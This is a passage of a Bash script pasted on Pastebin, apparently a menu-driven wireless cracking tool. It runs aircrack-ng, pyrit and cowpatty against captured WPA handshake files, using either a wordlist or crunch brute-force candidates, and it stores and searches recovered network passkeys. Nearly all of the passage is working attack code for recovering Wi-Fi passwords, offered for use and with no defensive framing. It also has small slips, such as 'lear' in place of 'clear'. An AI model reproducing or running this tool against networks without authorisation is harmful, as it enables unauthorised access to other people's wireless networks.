  2635.               rm arp-packet
  2636.               echo AP ESSID: $AP_essid >> $HOME/scrypta/Recovered-WPA-Passkeys.txt
  2637.               echo AP BSSID: $AP_bssid >> $HOME/scrypta/Recovered-WPA-Passkeys.txt
  2638.               echo WEP Passkey: $passkey >> $HOME/scrypta/Recovered-WPA-Passkeys.txt
  2639.               echo ' ' >> $HOME/scrypta/Recovered-WPA-Passkeys.txt
  2640.               fi
  2641.  
  2642.        echo -n $GREEN"Was the attack successful? (y or n)$STAND: "
  2643.        read -e CONFIRM
  2644.        case $CONFIRM in
  2645.        y|Y|YES|yes|Yes)
  2646.        break ;;
  2647.        *) echo ""
  2648.        esac
  2649.        done
  2650.        fi
  2651.        cd
  2652. ;;
  2653.  
  2654. ###### [6] Attack Handshake.cap Files ######
  2655. 6)
  2656. clear
  2657. echo $RED"###################################"
  2658. echo "#                                 #"
  2659. echo "#         With a wordlist         #"
  2660. echo "# $GREEN[1]$BLUE = Aircrack-ng               $RED#"
  2661. echo "# $GREEN[2]$BLUE = Pyrit                     $RED#"
  2662. echo "# $GREEN[3]$BLUE = Pyrit + Cowpatty          $RED#"
  2663. echo "#                                 #"
  2664. echo "#       Without a wordlist        #"
  2665. echo "# $GREEN[4]$BLUE = Crunch + Aircrack-ng      $RED#"
  2666. echo "# $GREEN[5]$BLUE = Crunch + Pyrit            $RED#"
  2667. echo "# $GREEN[6]$BLUE = Crunch + Pyrit + Cowpatty $RED#"
  2668. echo "#                                 #"
  2669. echo "###################################"
  2670. echo
  2671. echo $GREEN"Choose an option?"$STAND
  2672. read option
  2673. if [[ $option == "1" ]]; then
  2674.    clear
  2675.    echo $RED
  2676.    echo "############################################"
  2677.    echo "#                                          #"
  2678.    echo "#$STAND   Attack Capture File Using A Wordlist   $RED#"
  2679.    echo "#$STAND              (Aircrack-ng)               $RED#"
  2680.    echo "#                                          #"
  2681.    echo "############################################"
  2682.    echo
  2683.    echo $RED"eg: /root/Desktop/sky12345.cap"
  2684.    read -p $GREEN"Capture file location, name, extension$STAND: " CapNameLocation
  2685.    echo
  2686.    echo $RED"eg: /root/Desktop/wordlist.txt"
  2687.    read -p $GREEN"Wordlist location, name, extension$STAND: " WordlistNameLocation
  2688.    clear
  2689.    # Chosen user input options
  2690.    ############################
  2691.    echo
  2692.    echo $RED"You've chosen:"
  2693.    echo "=============="
  2694.    echo $RED"Capture file location, name, extension$STAND: $CapNameLocation"
  2695.    echo $RED"Wordlist location, name, extension$STAND: $WordlistNameLocation"
  2696.    echo
  2697.    echo $RED"Commands to launch:"
  2698.    echo "==================="
  2699.    echo $STAND"aircrack-ng -w $WordlistNameLocation $CapNameLocation"
  2700.    echo
  2701.    # Launch chosen commands/options
  2702.    #################################
  2703.    read -p $GREEN"Press enter to start"$STAND
  2704.    clear
  2705.    aircrack-ng -w $WordlistNameLocation $CapNameLocation
  2706.    fi
  2707. if [[ $option == "2" ]]; then
  2708.    clear
  2709.    echo $RED
  2710.    echo "############################################"
  2711.    echo "#                                          #"
  2712.    echo "#$STAND   Attack Capture File Using A Wordlist   $RED#"
  2713.    echo "#$STAND                 (Pyrit)                  $RED#"
  2714.    echo "#                                          #"
  2715.    echo "############################################"
  2716. echo
  2717. echo $RED"eg: 00:11:22:33:44:55"
  2718. read -p $GREEN"Access Point bssid$STAND: " bssid
  2719. echo
  2720. echo $RED"eg: /root/Desktop/sky12345.cap"
  2721. read -p $GREEN"Capture file location, name, extension$STAND: " CapNameLocation
  2722. echo
  2723. echo $RED"eg: /root/Desktop/wordlist.txt"
  2724. read -p $GREEN"Wordlist location, name, extension$STAND: " WordlistNameLocation
  2725. clear
  2726. # Chosen user input options
  2727. ############################
  2728. echo
  2729. echo $RED"You've chosen:"
  2730. echo "=============="
  2731. echo $RED"Access Point bssid$STAND: $bssid"
  2732. echo $RED"Capture file location, name, extension$STAND: $CapNameLocation"
  2733. echo $RED"Wordlist location, name, extension$STAND: $WordlistNameLocation"
  2734. echo
  2735. echo $RED"Commands to launch:"
  2736. echo "==================="
  2737. echo $STAND"pyrit -r $CapNameLocation -i $WordlistNameLocation -b $bssid attack_passthrough"
  2738. echo
  2739. # Launch chosen commands/options
  2740. #################################
  2741. read -p $GREEN"Press enter to start"$STAND
  2742. clear
  2743. pyrit -r $CapNameLocation -i $WordlistNameLocation -b $bssid attack_passthrough
  2744.                  fi
  2745.                  if [[ $option == "3" ]]; then
  2746.                                   clear
  2747. echo $RED
  2748. echo "############################################################################"
  2749. echo "#                                                                          #"
  2750. echo "#$STAND                   Attack Capture File Using A Wordlist                   $RED#"
  2751. echo "#$STAND                            (Pyrit + Cowpatty)                            $RED#"
  2752. echo "#                                                                          #"
  2753. echo "############################################################################"$STAND
  2754. echo
  2755. echo $RED"eg: sky12345"
  2756. read -p $GREEN"Access Point essid$STAND: " essid
  2757. echo
  2758. echo $RED"eg: /root/Desktop/sky12345.cap"
  2759. read -p $GREEN"Capture file location, name, extension$STAND: " CapNameLocation
  2760. echo
  2761. echo $RED"eg: /root/Desktop/wordlist.txt"
  2762. read -p $GREEN"Wordlist location, name, extension$STAND: " WordlistNameLocation
  2763. clear
  2764. # Chosen user input options
  2765. ############################
  2766. echo
  2767. echo $RED"You've chosen:"
  2768. echo "=============="
  2769. echo $RED"Access Point essid$STAND: $essid"
  2770. echo $RED"Capture file location, name, extension$STAND: $CapNameLocation"
  2771. echo $RED"Wordlist location, name, extension$STAND: $WordlistNameLocation"
  2772. echo
  2773. echo $RED"Commands to launch:"
  2774. echo "==================="
  2775. echo $STAND"cat $WordlistNameLocation | pyrit -e $essid -i - -o - passthrough | cowpatty -d - -r $CapNameLocation -s $essid"
  2776. echo
  2777. # Launch chosen commands/options
  2778. #################################
  2779. read -p $GREEN"Press enter to start"$STAND
  2780. clear
  2781. cat $WordlistNameLocation | pyrit -e $essid -i - -o - passthrough | cowpatty -d - -r $CapNameLocation -s $essid
  2782.                  fi
  2783.                  if [[ $option == "4" ]]; then
  2784.                                   lear
  2785. echo $RED
  2786. echo "############################################################################"
  2787. echo "#                                                                          #"
  2788. echo "#$STAND           Attack a Capture file without using a wordlist file            $RED#"
  2789. echo "#$STAND                          (Crunch + Aircrack-ng)                          $RED#"
  2790. echo "#                                                                          #"
  2791. echo "############################################################################"$STAND
  2792. echo
  2793. echo $RED"eg: abcdef23456789"
  2794. read -p $GREEN"Input the characters, digits, or symbols to be used$STAND: " CharacterSet
  2795. echo
  2796. echo $RED"eg: 10"
  2797. read -p $GREEN"Input the minimum length of the passwords$STAND: " PasswordLengthMin
  2798. echo
  2799. echo $RED"eg: 10"
  2800. read -p $GREEN"Input the maximum length of the passwords$STAND: " PasswordLengthMax
  2801. echo
  2802. echo $RED"eg:"
  2803. echo $RED"-d <Number> = Limits the amount of times a character, digit, or symbol can appear next to its self."
  2804. echo $RED"-s XXXXXXXXXX = Start point."
  2805. read -p $GREEN"Input any other optional crunch commands?$STAND: " OptionalCrunchOptions
  2806. echo
  2807. echo $RED"eg: sky12345"
  2808. read -p $GREEN"Access Point essid$STAND: " essid
  2809. echo
  2810. echo $RED"eg: /root/Desktop/sky12345.cap"
  2811. read -p $GREEN"Capture file location, name, extension$STAND: " CapNameLocation
  2812. clear
  2813. # Chosen user input options
  2814. ############################
  2815. echo
  2816. echo $RED"You've chosen:"
  2817. echo "=============="
  2818. echo $RED"Minimum length password$STAND: $PasswordLengthMin"
  2819. echo $RED"Maximum length of password$STAND: $PasswordLengthMax"
  2820. echo $RED"Characters, digits, symbols to be used in the passwords$STAND: $CharacterSet"
  2821. echo $RED"Other crunch commands?$STAND: $OptionalCrunchOptions"
  2822. echo $RED"Capture file location, name, extension$STAND: $CapNameLocation"
  2823. echo $RED"essid$STAND: $essid"
  2824. echo
  2825. echo $RED"Commands to launch:"
  2826. echo "==================="
  2827. echo $STAND"crunch $PasswordLengthMin $PasswordLengthMax $CharacterSet $OptionalCrunchOptions | aircrack-ng $CapNameLocation -e $essid -w -"
  2828. echo
  2829. # Launch chosen commands/options
  2830. #################################
  2831. read -p $GREEN"Press enter to start"$STAND
  2832. clear
  2833. crunch $PasswordLengthMin $PasswordLengthMax $CharacterSet $OptionalCrunchOptions | aircrack-ng $CapNameLocation -e $essid -w -
  2834.                  fi
  2835.                  if [[ $option == "5" ]]; then
  2836.                                   clear
  2837. echo $RED
  2838. echo "############################################################################"
  2839. echo "#                                                                          #"
  2840. echo "#$STAND           Attack a Capture file without using a wordlist file            $RED#"
  2841. echo "#$STAND                             (Crunch + Pyrit)                             $RED#"
  2842. echo "#                                                                          #"
  2843. echo "############################################################################"$STAND
  2844. echo
  2845. echo $RED"eg: abcdef23456789"
  2846. read -p $GREEN"Input the characters, digits, or symbols to be used$STAND: " CharacterSet
  2847. echo
  2848. echo $RED"eg: 10"
  2849. read -p $GREEN"Input the minimum length of the passwords$STAND: " PasswordLengthMin
  2850. echo
  2851. echo $RED"eg: 10"
  2852. read -p $GREEN"Input the maximum length of the passwords$STAND: " PasswordLengthMax
  2853. echo
  2854. echo $RED"eg:"
  2855. echo $RED"-d <Number> = Limits the amount of times a character, digit, or symbol can appear next to its self."
  2856. echo $RED"-s XXXXXXXXXX = Start point."
  2857. read -p $GREEN"Input any other optional crunch commands?$STAND: " OptionalCrunchOptions
  2858. echo
  2859. echo $RED"eg: sky12345"
  2860. read -p $GREEN"Access Point essid$STAND: " essid
  2861. echo
  2862. echo $RED"eg: /root/Desktop/sky12345.cap"
  2863. read -p $GREEN"Capture file location, name, extension$STAND: " CapNameLocation
  2864. clear
  2865. # Chosen user input options
  2866. ############################
  2867. echo
  2868. echo $RED"You've chosen:"
  2869. echo "=============="
  2870. echo $RED"Minimum length password$STAND: $PasswordLengthMin"
  2871. echo $RED"Maximum length of password$STAND: $PasswordLengthMax"
  2872. echo $RED"Characters, digits, symbols to be used in the passwords$STAND: $CharacterSet"
  2873. echo $RED"Other crunch commands?$STAND: $OptionalCrunchOptions"
  2874. echo $RED"Capture file location, name, extension$STAND: $CapNameLocation"
  2875. echo $RED"essid$STAND: $essid"
  2876. echo
  2877. echo $RED"Commands to launch:"
  2878. echo "==================="
  2879. echo $STAND"crunch $PasswordLengthMin $PasswordLengthMax $CharacterSet $OptionalCrunchOptions | pyrit -e $essid -r $CapNameLocation -i - attack_passthrough"
  2880. echo
  2881. # Launch chosen commands/options
  2882. #################################
  2883. read -p $GREEN"Press enter to start"$STAND
  2884. clear
  2885. crunch $PasswordLengthMin $PasswordLengthMax $CharacterSet $OptionalCrunchOptions | pyrit -e $essid -r $CapNameLocation -i - attack_passthrough
  2886.                  fi
  2887.                  if [[ $option == "6" ]]; then
  2888.                                   clear
  2889. echo $RED
  2890. echo "############################################################################"
  2891. echo "#                                                                          #"
  2892. echo "#$STAND           Attack a Capture file without using a wordlist file            $RED#"
  2893. echo "#$STAND                       (Crunch + Pyrit + Cowpatty)                        $RED#"
  2894. echo "#                                                                          #"
  2895. echo "############################################################################"$STAND
  2896. echo
  2897. echo $RED"eg: abcdef23456789"
  2898. read -p $GREEN"Input the characters, digits, or symbols to be used$STAND: " CharacterSet
  2899. echo
  2900. echo $RED"eg: 10"
  2901. read -p $GREEN"Input the minimum length of the passwords$STAND: " PasswordLengthMin
  2902. echo
  2903. echo $RED"eg: 10"
  2904. read -p $GREEN"Input the maximum length of the passwords$STAND: " PasswordLengthMax
  2905. echo
  2906. echo $RED"eg:"
  2907. echo $RED"-d <Number> = Limits the amount of times a character, digit, or symbol can appear next to its self."
  2908. echo $RED"-s XXXXXXXXXX = Start point."
  2909. read -p $GREEN"Input any other optional crunch commands?$STAND: " OptionalCrunchOptions
  2910. echo
  2911. echo $RED"eg: sky12345"
  2912. read -p $GREEN"Access Point essid$STAND: " essid
  2913. echo
  2914. echo $RED"eg: /root/Desktop/sky12345.cap"
  2915. read -p $GREEN"Capture file location, name, extension$STAND: " CapNameLocation
  2916. clear
  2917. # Chosen user input options
  2918. ############################
  2919. echo
  2920. echo $RED"You've chosen:"
  2921. echo "=============="
  2922. echo $RED"Minimum length password$STAND: $PasswordLengthMin"
  2923. echo $RED"Maximum length of password$STAND: $PasswordLengthMax"
  2924. echo $RED"Characters, digits, symbols to be used in the passwords$STAND: $CharacterSet"
  2925. echo $RED"Other crunch commands?$STAND: $OptionalCrunchOptions"
  2926. echo $RED"Capture file location, name, extension$STAND: $CapNameLocation"
  2927. echo $RED"essid$STAND: $essid"
  2928. echo
  2929. echo $RED"Commands to launch:"
  2930. echo "==================="
  2931. echo $STAND"crunch $PasswordLengthMin $PasswordLengthMax $CharacterSet $OptionalCrunchOptions | pyrit -e $essid -i - -o - passthrough | cowpatty -d - -r $CapNameLocation -s $essid"
  2932. echo
  2933. # Launch chosen commands/options
  2934. #################################
  2935. read -p $GREEN"Press enter to start"$STAND
  2936. clear
  2937. crunch $PasswordLengthMin $PasswordLengthMax $CharacterSet $OptionalCrunchOptions | pyrit -e $essid -i - -o - passthrough | cowpatty -d - -r $CapNameLocation -s $essid
  2938. fi
  2939. ;;
  2940. 7)
  2941. ###########################
  2942. # Show Recovered Passkeys #
  2943. ###########################
  2944. gnome-open $HOME/scrypta/Recovered-WPA-Passkeys.txt
  2945.  ;;
  2946. 8)
  2947. ##############################################################################
  2948. # Check In Recovered-WPA-Passkeys.txt To See If You Already Have The Passkey #
  2949. ##############################################################################
  2950. ###################
  2951. # Passkey Checker #
  2952. ###################
  2953. clear
  2954. echo $RED"How would you like to search."
  2955. echo $GREEN"[1]$BLUE = Search using the bssid."
  2956. echo $GREEN"[2]$BLUE = Search using the essid."
  2957. echo $GREEN"[0]$BLUE = Return To Previous Menu."
  2958. echo $GREEN"1, 2 or 0?"$STAND
  2959. read option
  2960.  
  2961. if [[ $option == "1" ]]; then
  2962. while true
  2963. do
  2964.    echo -n $GREEN"Please input the bssid of the access point you would like to check for?$STAND: "
  2965.    read -e SEARCHbssid
  2966.    grep -B 1 -A 2 $SEARCHbssid $HOME/scrypta/Recovered-WPA-Passkeys.txt
  2967.    echo
  2968. echo -n "Would you like to search again? (y or n): "
  2969. read -e CONFIRM
  2970. case $CONFIRM in
  2971. n|N|NO|no|No)
  2972. break ;;
  2973. *) echo ""
  2974. esac
  2975. done
  2976. fi
  2977. if [[ $option == "2" ]]; then
  2978. while true
  2979. do
  2980.    echo -n $GREEN"Please input the essid of the access point you would like to check for?$STAND: "
  2981.    read -e SEARCHessid
  2982.    grep -A 3 $SEARCHessid $HOME/scrypta/Recovered-WPA-Passkeys.txt
  2983.    echo
  2984. echo -n "Would you like to search again? (y or n): "
  2985. read -e CONFIRM
  2986. case $CONFIRM in
  2987. n|N|NO|no|No)
  2988. break ;;
  2989. *) echo ""
  2990. esac
  2991. done
  2992. fi
  2993. if [[ $option == "0" ]]; then
  2994. echo "Returning To Menu"
  2995. fi
  2996.  ;;
  2997. 0) exit 0;;
  2998. *) echo "You've chosen an invalid option, please choose again";
  2999. echo "Press [Enter] to continue. . ." ; read ;;
  3000. esac
  3001. done
RAW Paste Data
Pastebin PRO Autumn Special!
Get 40% OFF on Pastebin PRO accounts!
Top